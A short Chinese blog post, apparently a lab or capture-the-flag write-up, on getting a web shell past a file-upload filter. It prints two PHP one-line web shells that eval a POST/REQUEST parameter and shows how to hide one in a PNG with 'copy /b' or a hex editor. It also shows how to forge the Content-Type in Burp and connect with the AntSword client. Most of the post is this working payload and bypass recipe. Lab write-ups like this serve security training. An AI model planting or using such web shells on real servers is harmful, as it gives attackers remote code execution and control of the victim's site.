✨PHP一句话木马
<?php @eval($_POST["pass"]);?>
<?php eval($_REQUEST["pass"]);?>
详情可浏览:Web安全-一句话木马
✨制作图片马
1)copy命令
copy 1.png/b+1.php/a pic.php
!!!不要使用powershell 请使用cmd
//powershell中copy命令应该命令参数不一样 导致各种报错
2)文本编辑器/十六进制编辑器
用文本编辑器/十六进制编辑器打开图片在末尾添加一句话木马
然后保存为xxx.php
//经过测试后续也可以蚁剑连接 和copy命令比较只是文件末尾少了个1A(文件结束符)
✨Burp改包
Burp开启proxy后对文件上传submit抓包
然后修改Content-Type为image/png
!注意修改位置
//靶场环境只允许PNG、JPG、GIF格式文件上传 改包绕过
✨蚁剑连接
获得flag
结束。
✨图片马注意点
开始遇到问题蚁剑一直连接失败
后来选用了较为简单的图片制作图片马蚁剑就连接成功了
制作图片马的图片一定要简单 越简单越好
比如下面这样的
⭐转载请注明出处
本文作者:双份浓缩馥芮白
原文链接:https://www.cnblogs.com/Flat-White/p/13673112.html
版权所有,如需转载请注明出处。